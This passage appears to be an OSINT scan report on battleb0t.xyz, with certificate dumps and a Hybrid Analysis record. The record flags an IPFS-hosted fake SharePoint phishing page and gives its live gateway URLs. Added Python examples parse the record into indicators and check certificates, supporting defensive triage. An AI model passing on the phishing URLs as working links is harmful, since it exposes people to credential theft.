keyid:8D:8C:5E:C4:54:AD:8A:E1:77:E9:9B:F9:9B:05:E1:B8:01:8D:61:E1
X509v3 Subject Key Identifier:
C9:A4:B7:DE:EA:0B:C6:29:AD:C2:08:FF:9A:8D:BB:00:2C:61:53:C2
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Certificate Policies:
Policy: 1.3.6.1.4.1.6449.1.2.2.7
CPS: https://sectigo.com/CPS
Policy: 2.23.140.1.2.1
Authority Information Access:
CA Issuers - URI:http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
OCSP - URI:http://ocsp.sectigo.com
X509v3 Subject Alternative Name:
DNS:*.cloudwaysapps.com, DNS:cloudwaysapps.com
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Apr 27 08:49:21.510 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:54:5F:22:AA:E5:91:D8:97:BC:1A:12:E0:
0D:19:AD:B4:23:74:C7:19:0B:C4:40:FB:51:89:5B:39:
3E:C4:C1:CC:02:21:00:DD:E6:D8:AC:B4:ED:A2:F3:9F:
C5:81:F6:57:5C:08:09:CE:A0:CE:8E:00:A3:67:0E:10:
B5:84:4C:5D:F0:6B:A3
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : DA:B6:BF:6B:3F:B5:B6:22:9F:9B:C2:BB:5C:6B:E8:70:
91:71:6C:BB:51:84:85:34:BD:A4:3D:30:48:D7:FB:AB
Timestamp : Apr 27 08:49:21.600 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:9D:80:77:45:D7:5E:B4:81:61:12:02:
29:B7:09:6D:AA:A8:EE:C0:C9:01:FE:75:B3:DD:F0:06:
DC:3E:42:DF:D0:02:21:00:F3:29:18:40:3E:1C:7B:74:
47:39:A3:57:7F:3D:0C:BE:90:CC:A8:A1:A7:11:FB:28:
6B:3A:89:A0:1D:92:A4:B6
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : EE:CD:D0:64:D5:DB:1A:CE:C5:5C:B7:9D:B4:CD:13:A2:
32:87:46:7C:BC:EC:DE:C3:51:48:59:46:71:1F:B5:9B
Timestamp : Apr 27 08:49:21.550 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:7C:D6:D7:21:C2:B8:D3:3C:1A:E2:29:5D:
A7:78:9A:B9:61:1E:8F:1D:0D:45:66:77:67:5A:0C:C3:
73:FD:9F:2E:02:20:1B:D9:E7:E8:46:D6:95:23:C8:69:
C9:B7:FD:00:71:38:3D:72:E8:26:CA:93:39:E1:22:47:
44:C3:7B:B6:58:C7
Signature Algorithm: sha256WithRSAEncryption
c2:e5:27:b1:49:8d:0c:b8:23:cc:ad:af:a2:37:17:1f:51:5f:
10:2b:2e:2c:a5:d0:39:c9:d2:53:1f:0e:b5:e4:c2:19:75:77:
48:c8:b8:2e:d8:97:35:66:1c:7f:72:90:0f:1a:b8:3a:65:bd:
9f:90:0c:35:2b:9e:fa:54:ce:78:18:0b:07:4e:0e:d6:da:2d:
b2:8b:53:d5:da:55:08:c8:37:85:a6:8b:12:14:78:6a:d5:51:
7e:f7:58:58:6a:f4:59:0c:a3:31:26:2d:fd:1a:fe:da:d0:05:
5d:26:d1:01:9e:67:1c:9c:4d:2b:07:03:e0:1f:19:40:76:89:
3d:9f:ba:6c:0c:01:c7:12:04:82:d0:3c:b5:b0:6c:8c:48:af:
91:80:42:07:ba:a0:18:f2:c7:57:76:34:05:a4:b2:7b:9f:cd:
f2:57:04:13:8a:15:7b:e3:78:fd:cc:f9:fb:3e:ee:46:57:be:
a8:be:94:c1:0c:96:ec:10:93:e0:36:2d:91:5c:a3:c9:e4:2d:
7c:ba:e9:51:8b:91:a0:77:08:a8:df:48:5b:6f:72:7a:d3:ed:
ad:97:85:76:71:19:18:df:9e:f7:1b:82:3f:24:cc:75:af:96:
74:0e:15:b3:cc:fb:a8:3c:e6:07:2b:89:aa:f9:0a:70:0d:02:
b5:99:9c:87
| 64.226.81.43 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.105): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:08:46 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.216 | 104.196.30.220 |
| 2023-05-12 02:53:11 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link/sharepoint.html', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.infura-ipfs.io/sharepoint.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "UpdatingNewTabPageData"\n "IsoScope_de8_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_de8_IE_EarlyTabStart_0x8b0_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_de8_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_de8_ConnHashTable<3560>_HashTable_Mutex"\n "IsoScope_de8_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3560"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_de8_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"54.80.64.45:443"\n "209.94.90.1:443"\n "185.199.109.153:443"\n "69.16.175.10:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link"\n "bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.infura-ipfs.io"\n "code.jquery.com"\n "lipis.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ".fa-twitter-square:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-twitter:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube-square:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube-play:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-paypal:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-cc-paypal:before {" (Indicator: "dir "; File: "font-awesome_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfee8339b462d85023.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{c8fced47-ece3-11ed-b5bc-0800279f3332}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df4135609b0254a2dd.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{c8fced49-ece3-11ed-b5bc-0800279f3332}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfee8339b462d85023.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{c8fced47-ece3-11ed-b5bc-0800279f3332}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{c8fced49-ece3-11ed-b5bc-0800279f3332}.dat"\n "iexplore.exe" writes file 
"c:\\users\\%osuser%\\appdata\\local\\temp\\~df4135609b0254a2dd.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "sharepoint_2_.htm" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "jquery-1.9.1_1_.js" has type "ASCII text"- [targetUID: N/A]\n "fontawesome-webfont_3_.eot" has type "Embedded OpenType (EOT) FontAwesome family"- [targetUID: N/A]\n "Cab387B.tmp" has type "data"- Location: [%TEMP%\\Cab387B.tmp]- [targetUID: 00000000-00003120]\n "font-awesome_1_.css" has type "troff or preprocessor input ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003560]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF95F11EBB1A557328.TMP" has type "data"- Location: [%TEMP%\\~DF95F11EBB1A557328.TMP]- [targetUID: 00000000-00003560]\n "~DF4135609B0254A2DD.TMP" has type "data"- Location: [%TEMP%\\~DF4135609B0254A2DD.TMP]- [targetUID: 00000000-00003560]\n "~DFC782EAE3F96BDD8E.TMP" has type "data"- Location: [%TEMP%\\~DFC782EAE3F96BDD8E.TMP]- [targetUID: 00000000-00003560]\n "~DFEE8339B462D85023.TMP" has type "data"- Location: [%TEMP%\\~DFEE8339B462D85023.TMP]- [targetUID: 00000000-00003560]\n "RecoveryStore._C8FCED47-ECE3-11ED-B5BC-0800279F3332_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_C8FCED49-ECE3-11ED-B5BC-0800279F3332_.dat" has type "Composite Document File V2 Document Cannot 
read short stream"- [targetUID: N/A]\n "_D2333118-ECE3-11ED-B5BC-0800279F3332_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003120]\n "BX9T8Y4S.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BX9T8Y4S.txt]- [targetUID: 00000000-00003560]\n "UK2REO93.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UK2REO93.txt]- [targetUID: 00000000-00003560]\n "7NLF2DJG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7NLF2DJG.txt]- [targetUID: 00000000-00003560]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003120]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "2N428A4N.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2N428A4N.txt]- [targetUID: 00000000-00003560]\n "sharepoint_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "CTXLPLXJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CTXLPLXJ.txt]- [targetUID: 00000000-00003560]\n "2OBJD0QQ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2OBJD0QQ.txt]- [targetUID: 00000000-00003560]\n "L7SEJ68Q.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L7SEJ68Q.txt]- [targetUID: 00000000-00003560]\n "urlref_httpsbafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.infura-ipfs.iosharepoint.html" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "Cab22DC.tmp" has type "data"- Location: [%TEMP%\\Cab22DC.tmp]- [targetUID: 
00000000-00003120]\n "Cab22ED.tmp" has type "data"- Location: [%TEMP%\\Cab22ED.tmp]- [targetUID: 00000000-00003120]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003120]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Window | 185.199.109.153 |
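The Hybrid Analysis row above is stored as a Python repr (`u'...'` strings, `None`), not JSON, so `json.loads` will not read it and `eval` must not be used on scanner output. The following is an added example, not SpiderFoot or Hybrid Analysis code, showing how to parse such a record safely with `ast.literal_eval` and pull out the indicators a responder needs: the classification, the contacted IP:port endpoints and DNS names from the Network Traffic signatures, the ATT&CK IDs, and the IPFS content identifier. The page shows the same phishing page (`sharepoint.html`) served through two gateways (`infura-ipfs.io` and `dweb.link`); the CID in the gateway subdomain is the durable indicator, because the same content is reachable through any public gateway. The sample record is a constructed, trimmed copy of the page's row in the same repr format; the regexes and bucket names are this example's own assumptions.

```python
"""Extract IOCs from a Hybrid Analysis record stored as a Python repr.

Added example, not SpiderFoot or Hybrid Analysis code. Assumes the record is a
list of report dicts with the keys visible on the page, and that Network
Traffic signatures list one double-quoted value per line.
"""
import ast
import re

# Constructed sample: a trimmed copy of the record on this page, same repr format.
SAMPLE_RECORD = r"""[{u'subsystem': None, u'classification_tags': [u'phishing'], u'threat_score': 100,
  u'submit_name': u'https://bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.infura-ipfs.io/sharepoint.html',
  u'crowdstrike_ai': {u'analysis_related_urls': [{u'url': u'https://bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link/sharepoint.html', u'type': u'extracted', u'verdict': u'suspicious'}]},
  u'signatures': [
    {u'origin': u'Network Traffic', u'name': u'Contacts server', u'attck_id': u'T1071',
     u'description': u'"54.80.64.45:443"\n "209.94.90.1:443"\n "185.199.109.153:443"'},
    {u'origin': u'Network Traffic', u'name': u'Queries DNS server', u'attck_id': u'T1071.004',
     u'description': u'"bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link"\n "code.jquery.com"'},
    {u'origin': u'Created Mutant', u'name': u'Creates mutants', u'attck_id': None,
     u'description': u'"Local\\ZonesCacheCounterMutex"'}]}]"""

# Subdomain-style gateway (<cid>.ipfs.<gateway>) and path-style (<gateway>/ipfs/<cid>).
IPFS_SUBDOMAIN = re.compile(r"^https?://(?P<cid>[a-z2-7]{20,})\.ipfs\.(?P<gateway>[^/]+)", re.I)
IPFS_PATH = re.compile(r"^https?://(?P<gateway>[^/]+)/ipfs/(?P<cid>[A-Za-z0-9]{20,})")
QUOTED = re.compile(r'"([^"]+)"')
IP_PORT = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}:\d+$")


def ipfs_cid(url):
    """Return the content identifier behind a gateway URL, or None for non-IPFS URLs."""
    for rx in (IPFS_SUBDOMAIN, IPFS_PATH):
        m = rx.match(url)
        if m:
            return m.group("cid")
    return None


def load_record(text):
    """Parse the stored repr with ast.literal_eval: literals only, never eval()."""
    data = ast.literal_eval(text)
    return data if isinstance(data, list) else [data]


def extract_iocs(text):
    """Collect tags, URLs, IPFS CIDs, network endpoints, DNS names and ATT&CK IDs."""
    iocs = {"tags": set(), "urls": set(), "ipfs_cids": set(), "endpoints": set(),
            "dns": set(), "attck": set(), "threat_score": 0}
    for report in load_record(text):
        iocs["tags"].update(report.get("classification_tags") or [])
        iocs["threat_score"] = max(iocs["threat_score"], report.get("threat_score") or 0)
        related = (report.get("crowdstrike_ai") or {}).get("analysis_related_urls") or []
        for url in [report.get("submit_name")] + [u.get("url") for u in related]:
            if not url:
                continue
            iocs["urls"].add(url)
            cid = ipfs_cid(url)
            if cid:
                iocs["ipfs_cids"].add(cid)
        for sig in report.get("signatures") or []:
            if sig.get("attck_id"):
                iocs["attck"].add(sig["attck_id"])
            if sig.get("origin") != "Network Traffic":
                continue  # mutex/file signatures are host artefacts, not network IOCs
            for value in QUOTED.findall(sig.get("description") or ""):
                bucket = "endpoints" if IP_PORT.match(value) else "dns"
                iocs[bucket].add(value)
    return iocs


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_RECORD).items():
        print(f"{key}: {sorted(value) if isinstance(value, set) else value}")
```

Blocking or hunting on the CID rather than on `*.ipfs.dweb.link` or `*.ipfs.infura-ipfs.io` covers every gateway the same content can be fetched through; the gateway hostnames themselves are shared infrastructure and make poor block-list entries.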
| 2023-05-12 03:12:10 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | WOT Services , community of volunteer users ranking website reputation. | baffin.netcraft.com |
| 2023-05-12 02:54:44 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 35.229.48.116:443 | 35.229.48.116 |
| 2023-05-12 03:09:43 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 122.97.148.34.bc.googleusercontent.com | 34.148.97.122 |
| 2023-05-12 02:44:06 | Internet Name | No | CertSpotter | 28 | 0 | 1 | 0 | None | nwapi2.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f60721cb70f8d-EWR | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:23 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-19c8\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:23 GMT", "cf-ray": "7c5f60721cb70f8d-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 02:45:24 | Physical Location | No | ipapi.co | 1 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, HE, Germany, DE | 64.226.81.43 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.56): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:46:42 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:04:02:53:52:8b:ff:fb:8a:0a:11:44:e7:ab:f5:69:c5:9e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 14 17:33:43 2023 GMT
Not After : Apr 14 17:33:42 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:56:66:b3:c8:a2:23:b1:5a:3f:a8:f8:12:86:96:
e9:2c:15:d7:f2:10:34:11:7a:db:91:0d:f0:b3:57:
f5:24:8b:d6:33:b2:e0:da:47:1e:c3:4b:59:19:6f:
0a:27:ae:26:29:f9:b7:07:60:5c:49:2f:47:35:2a:
5c:c8:f0:96:d7
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3C:85:65:2A:BA:2A:04:2A:54:22:30:3E:E5:23:B1:1E:15:C3:96:05
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
35:8e:ad:47:f4:d5:0c:35:7b:16:d0:9b:94:a8:b1:26:20:fb:
c5:de:a5:93:db:57:19:e0:12:90:43:82:bc:d6:2f:43:eb:2e:
4c:de:6a:4e:5a:f7:3a:69:b4:d3:79:d5:3c:fc:10:95:09:06:
01:1c:46:7d:6d:7c:be:7f:a8:01:e3:93:44:8e:bd:bd:0d:b0:
bd:c9:0f:53:30:c3:5b:43:1c:de:0d:db:29:b4:9c:76:9a:cb:
51:4b:06:1b:20:dd:ec:e9:a2:bf:56:76:bf:92:0c:eb:70:70:
9b:b4:4a:4f:2d:37:e0:34:a0:a3:ff:13:86:8a:79:7e:16:1e:
8e:c6:82:ca:0f:96:f3:8a:2f:c4:0b:aa:a8:ac:55:f4:88:40:
e0:16:cf:a7:dc:c0:30:00:8e:a5:37:c8:bd:86:e7:c9:7f:a2:
43:a8:8f:4d:72:0e:2a:78:36:4d:70:de:f4:63:fb:7a:69:dd:
eb:ae:02:25:ec:2e:30:97:68:f6:5a:d7:e8:b6:58:95:b6:c1:
cc:b3:c2:25:09:9a:c8:a4:d7:3d:29:63:7c:34:a0:fc:c2:d0:
5c:94:37:dd:b4:c4:b6:03:3f:3d:50:00:5d:5e:7b:c9:e9:6b:
3d:db:2e:3d:c8:b1:34:d0:37:5f:80:1d:38:7f:1c:95:f3:da:
c4:21:7d:17
| battleb0t.xyz |
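Two certificate rows above need a caveat before they are read as evidence about battleb0t.xyz. The SSL Certificate Analyzer row for 64.226.81.43 recorded a certificate for `*.cloudwaysapps.com` / `cloudwaysapps.com`, which covers no battleb0t name, so it tells you only that the IP answers TLS with a hosting provider's certificate. The Certificate Transparency row for `funny.battleb0t.xyz` carries the critical `CT Precertificate Poison` extension, so it is a precertificate submitted to the CT log, not a certificate a TLS endpoint ever serves, and its `Not After` date (2023-04-14) had already passed by the scan date (2023-05-12). The following added example, not SpiderFoot code, parses the `openssl x509 -text` layout the scanner stored and attaches exactly those findings: name coverage (a wildcard matching one leftmost label only), validity against the scan time, and the precertificate flag. The two sample dumps are constructed trims of the page's own certificates containing only the fields the checks read; the field labels and GMT timestamps are assumed to follow OpenSSL's text output.

```python
"""Sanity checks on certificate dumps in the `openssl x509 -text` layout.

Added example, not SpiderFoot code. Assumes OpenSSL field labels, GMT
timestamps, and the scan timestamp (2023-05-12) as the reference time.
"""
import re
from datetime import datetime

SCAN_TIME = datetime(2023, 5, 12, 2, 46, 42)  # scan timestamp from the table

# Constructed samples: the decision-relevant lines of the two certificates on
# this page, trimmed to the fields the checks below read.
CERT_SERVED_BY_64_226_81_43 = """\
Certificate:
    Data:
        Issuer: C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA
        Validity
            Not Before: Apr 27 00:00:00 2023 GMT
            Not After : May 27 23:59:59 2024 GMT
        Subject: CN=*.cloudwaysapps.com
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:*.cloudwaysapps.com, DNS:cloudwaysapps.com
"""
CERT_FROM_CT_LOG = """\
Certificate:
    Data:
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Jan 14 17:33:43 2023 GMT
            Not After : Apr 14 17:33:42 2023 GMT
        Subject: CN=funny.battleb0t.xyz
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:funny.battleb0t.xyz
            CT Precertificate Poison: critical
                NULL
"""


def _parse_time(value):
    return datetime.strptime(value.strip(), "%b %d %H:%M:%S %Y GMT")


def parse_cert_text(text):
    """Pull issuer, subject CN, validity, SANs and the precert flag from a text dump."""
    info = {"issuer": None, "subject_cn": None, "not_before": None,
            "not_after": None, "sans": [], "precert": False}
    lines = iter(text.splitlines())
    for line in lines:
        s = line.strip()
        if s.startswith("Issuer:"):
            info["issuer"] = s.split(":", 1)[1].strip()
        elif s.startswith("Subject:"):
            m = re.search(r"CN=([^,/]+)", s)
            info["subject_cn"] = m.group(1).strip() if m else None
        elif s.startswith("Not Before"):
            info["not_before"] = _parse_time(s.split(":", 1)[1])
        elif s.startswith("Not After"):
            info["not_after"] = _parse_time(s.split(":", 1)[1])
        elif s.startswith("X509v3 Subject Alternative Name"):
            san_line = next(lines, "")  # the DNS: list sits on the following line
            info["sans"] = [e.split(":", 1)[1].strip() for e in san_line.split(",")
                            if e.strip().startswith("DNS:")]
        elif s.startswith("CT Precertificate Poison"):
            info["precert"] = True
    return info


def name_matches(hostname, pattern):
    """RFC 6125-style match: a leading wildcard covers exactly one label."""
    host, pat = hostname.lower().rstrip("."), pattern.lower()
    if pat.startswith("*."):
        base = pat[2:]
        return host.endswith("." + base) and "." not in host[: -len(base) - 1]
    return host == pat


def evaluate(info, expected_name, now=SCAN_TIME):
    """Return the findings a scanner should attach before trusting this record."""
    findings = []
    if info["precert"]:
        findings.append("precertificate (CT poison extension): a CT-log artifact, "
                        "not a certificate a TLS endpoint serves")
    names = info["sans"] or ([info["subject_cn"]] if info["subject_cn"] else [])
    if not any(name_matches(expected_name, n) for n in names):
        findings.append(f"name mismatch: {expected_name} not covered by {names}")
    if info["not_after"] < now:
        findings.append(f"expired {info['not_after']:%Y-%m-%d}")
    elif info["not_before"] > now:
        findings.append("not yet valid")
    return findings


if __name__ == "__main__":
    for text, name in ((CERT_SERVED_BY_64_226_81_43, "64.226.81.43"),
                       (CERT_FROM_CT_LOG, "funny.battleb0t.xyz")):
        print(name, evaluate(parse_cert_text(text), name))
```

For the first dump the only finding is the name mismatch; for the second, the precertificate flag and the expiry. A precertificate in a CT log still proves that a CA issued for that name at that time, which is useful for enumeration, but it says nothing about what the host serves today.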
